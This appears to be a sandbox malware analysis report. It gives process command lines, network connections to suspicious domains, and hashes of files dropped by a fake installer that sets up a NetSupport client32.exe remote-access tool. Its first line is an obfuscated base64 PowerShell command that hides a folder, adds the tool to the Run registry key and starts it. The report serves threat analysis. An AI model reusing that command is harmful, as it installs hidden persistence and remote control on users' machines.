PQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EE688E235AC8F138C0204F099AFD0F6 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DD47AE7F6A97798668302640F90AD693 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DD47AE7F6A97798668302640F90AD693 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=712647CD1C93C35264ECFF1E4174BFE1 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0BF2811DA29824B2B61196B77E7E8C92 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0BF2811DA29824B2B61196B77E7E8C92 --renderer-client-id=5 --mojo-platform-channel-handle=1992 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BEFC56AD0A9B409506C6FDF9B2C90E2 --mojo-platform-channel-handle=2764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AF9D0A4FD79CABE186088E9BDB3B44B9 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 45.61.158.86:80 | 45.61.158.86 | tcp |
| US | 8.8.8.8:53 | 86.158.61.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gailsacademy.com | udp |
| NL | 23.254.231.157:443 | gailsacademy.com | tcp |
| US | 8.8.8.8:53 | 157.231.254.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 8.8.8.8:53 | fusion-avto.com | udp |
| US | 104.26.0.231:80 | geo.netsupportsoftware.com | tcp |
| CH | 94.247.42.62:443 | fusion-avto.com | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.42.247.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.240.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | availabkelk.store | udp |
| US | 8.8.8.8:53 | questionsmw.store | udp |
| US | 8.8.8.8:53 | soldiefieop.site | udp |
| US | 8.8.8.8:53 | abnomalrkmu.site | udp |
| US | 8.8.8.8:53 | chorusarorp.site | udp |
| US | 8.8.8.8:53 | treatynreit.site | udp |
| US | 8.8.8.8:53 | snarlypagowo.site | udp |
| US | 8.8.8.8:53 | mysterisop.site | udp |
| US | 8.8.8.8:53 | absorptioniw.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | sergei-esenin.com | udp |
| US | 104.21.53.8:443 | sergei-esenin.com | tcp |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.53.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
| MD5 | 5ecd826babbebdd959456c471dec6465 |
| SHA1 | f94a596b742c0653ff7201469f133108f17b46e9 |
| SHA256 | b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea |
| SHA512 | 30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
| MD5 | 48c96771106dbdd5d42bba3772e4b414 |
| SHA1 | e84749b99eb491e40a62ed2e92e4d7a790d09273 |
| SHA256 | a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22 |
| SHA512 | 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c |
memory/684-220-0x0000000000400000-0x000000000042F000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll
| MD5 | bf38660a9125935658cfa3e53fdc7d65 |
| SHA1 | 0b51fb415ec89848f339f8989d323bea722bfd70 |
| SHA256 | 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa |
| SHA512 | 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll
| MD5 | 39c302fe0781e5af6d007e55f509606a |
| SHA1 | 23690a52e8c6578de6a7980bb78aae69d0f31780 |
| SHA256 | b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc |
| SHA512 | 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg
| MD5 | 9fd47c1a487b79a12e90e7506469477b |
| SHA1 | 7814df0ff2ea1827c75dcd73844ca7f025998cc6 |
| SHA256 | a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e |
| SHA512 | 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll
| MD5 | de2167a880207bbf7464bcd1f8bc8657 |
| SHA1 | 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7 |
| SHA256 | fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3 |
| SHA512 | bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll
| MD5 | 73bd0b62b158c5a8d0ce92064600620d |
| SHA1 | 63c74250c17f75fe6356b649c484ad5936c3e871 |
| SHA256 | e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30 |
| SHA512 | eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index
| MD5 | 91aa6ea7320140f30379f758d626e59d |
| SHA1 | 3be2febe28723b1033ccdaa110eaf59bbd6d1f96 |
| SHA256 | 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4 |
| SHA512 | 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll
| MD5 | cb99b83bbc19cd0e1c2ec6031d0a80bc |
| SHA1 | 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd |
| SHA256 | 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec |
| SHA512 | 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba |
memory/3616-239-0x0000000002260000-0x0000000002288000-memory.dmp
memory/3616-245-0x00000000022A8000-0x00000000022B0000-memory.dmp
memory/3616-247-0x00000000022B0000-0x00000000022B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index
| MD5 | 77abe2551c7a5931b70f78962ac5a3c7 |
| SHA1 | a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc |
| SHA256 | c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4 |
| SHA512 | 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935 |
memory/3616-265-0x0000000002298000-0x00000000022A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar
| MD5 | f5ad16c7f0338b541978b0430d51dc83 |
| SHA1 | 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a |
| SHA256 | 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d |
| SHA512 | 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar
| MD5 | 6696368a09c7f8fed4ea92c4e5238cee |
| SHA1 | f89c282e557d1207afd7158b82721c3d425736a7 |
| SHA256 | c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4 |
| SHA512 | 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar
| MD5 | b50e2c75f5f0e1094e997de8a2a2d0ca |
| SHA1 | d789eb689c091536ea6a01764bada387841264cb |
| SHA256 | cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23 |
| SHA512 | 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar
| MD5 | 7e5e3d6d352025bd7f093c2d7f9b21ab |
| SHA1 | ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57 |
| SHA256 | 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a |
| SHA512 | c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar
| MD5 | 0c8768cdeb3e894798f80465e0219c05 |
| SHA1 | c4da07ac93e4e547748ecc26b633d3db5b81ce47 |
| SHA256 | 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669 |
| SHA512 | 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar
| MD5 | 5134a2350f58890ffb9db0b40047195d |
| SHA1 | 751f548c85fa49f330cecbb1875893f971b33c4e |
| SHA256 | 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32 |
| SHA512 | c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar
| MD5 | 3e5e8cccff7ff343cbfe22588e569256 |
| SHA1 | 66756daa182672bff27e453eed585325d8cc2a7a |
| SHA256 | 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4 |
| SHA512 | 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar
| MD5 | c7f4b29600c2353f7599dd4da851dae4 |
| SHA1 | cfd3a61067e1982a56e1c5c77e53bbd523ad1dcc |
| SHA256 | 95371359a009dd7102e05aa36bc395c391772fc6066e95b46cbceadff1b6a58d |
| SHA512 | e51bd0c5ffd5db1746b2d928f4610b7bd186a392652b5cac06200c226c69516933491e8dcb171e27be53fb9b7c5a28b8cd8f0c7bd6d1aaac3211bd5ba2fdaf06 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT
| MD5 | fc605d978e7825595d752df2ef03f8af |
| SHA1 | c493c9541caaee4bfe3b3e48913fd9df7809299f |
| SHA256 | 7d697eaa9acf50fe0b57639b3c62ff02916da184f191944f49eca93d0bb3374f |
| SHA512 | fb811de6a2b36b28ca904224ea3525124bd4628ca9618c70eb9234ab231a09c1b1f28d9b6301581a4fa2e20f1036d5e1c3d6f1bf316c7fe78ef6edeae50ea40e |
memory/3616-266-0x00000000022F8000-0x0000000002300000-memory.dmp
memory/3616-263-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/3616-262-0x0000000002300000-0x0000000002308000-memory.dmp
memory/3616-277-0x0000000002308000-0x0000000002310000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar
| MD5 | fde38932b12fc063451af6613d4470cc |
| SHA1 | bc08c114681a3afc05fb8c0470776c3eae2eefeb |
| SHA256 | 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830 |
| SHA512 | 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar
| MD5 | d5ef47c915bef65a63d364f5cf7cd467 |
| SHA1 | f711f3846e144dddbfb31597c0c165ba8adf8d6b |
| SHA256 | 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6 |
| SHA512 | 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar
| MD5 | 042b3675517d6a637b95014523b1fd7d |
| SHA1 | 82161caf5f0a4112686e4889a9e207c7ba62a880 |
| SHA256 | a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22 |
| SHA512 | 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35 |
memory/3616-282-0x0000000002310000-0x0000000002318000-memory.dmp
memory/3616-284-0x0000000002318000-0x0000000002320000-memory.dmp
memory/3616-286-0x0000000002320000-0x0000000002328000-memory.dmp
memory/3616-288-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-290-0x0000000002328000-0x0000000002330000-memory.dmp
memory/3616-289-0x0000000002260000-0x0000000002288000-memory.dmp
memory/3616-291-0x0000000000780000-0x0000000000781000-memory.dmp
memory/3616-294-0x0000000002330000-0x0000000002338000-memory.dmp
memory/3616-293-0x00000000022A8000-0x00000000022B0000-memory.dmp
memory/3616-298-0x0000000002338000-0x0000000002340000-memory.dmp
memory/3616-297-0x00000000022B0000-0x00000000022B8000-memory.dmp
memory/3616-303-0x0000000002340000-0x0000000002348000-memory.dmp
memory/3616-302-0x0000000002298000-0x00000000022A0000-memory.dmp
memory/3616-301-0x0000000002300000-0x0000000002308000-memory.dmp
memory/3616-307-0x0000000002348000-0x0000000002350000-memory.dmp
memory/3616-310-0x0000000002350000-0x0000000002358000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar
| MD5 | 4bc2aea7281e27bc91566377d0ed1897 |
| SHA1 | d02d897e8a8aca58e3635c009a16d595a5649d44 |
| SHA256 | 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288 |
| SHA512 | da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10 |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar
| MD5 | 0a79304556a1289aa9e6213f574f3b08 |
| SHA1 | 7ee3bde3b1777bf65d4f62ce33295556223a26cd |
| SHA256 | 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79 |
| SHA512 | 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data
| MD5 | f6258230b51220609a60aa6ba70d68f3 |
| SHA1 | b5b95dd1ddcd3a433db14976e3b7f92664043536 |
| SHA256 | 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441 |
| SHA512 | b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f |
memory/3616-316-0x0000000002358000-0x0000000002360000-memory.dmp
memory/3616-315-0x0000000002308000-0x0000000002310000-memory.dmp
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar
| MD5 | 20f6f88989e806d23c29686b090f6190 |
| SHA1 | 1fdb9a66bb5ca587c05d3159829a8780bb66c87d |
| SHA256 | 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16 |
| SHA512 | 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE
| MD5 | 67cb88f6234b6a1f2320a23b197fa3f6 |
| SHA1 | 877aceba17b28cfff3f5df664e03b319f23767a1 |
| SHA256 | 263e21f4b43c118a8b4c07f1a8acb11cafc232886834433e34187f5663242360 |
| SHA512 | 4d43e5edecab92cebd853204c941327dccbfd071a71f066c12f7fb2f1b2def59c37a15ce05c4fe06ec2ea296b8630c4e938254a8a92e149e4a0a82c4307d648f |
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar
| MD5 | 0fd8bc4f0f2e37feb1efc474d037af55 |
| SHA1 | add8fface4c1936787eb4bffe4ea944a13467d53 |
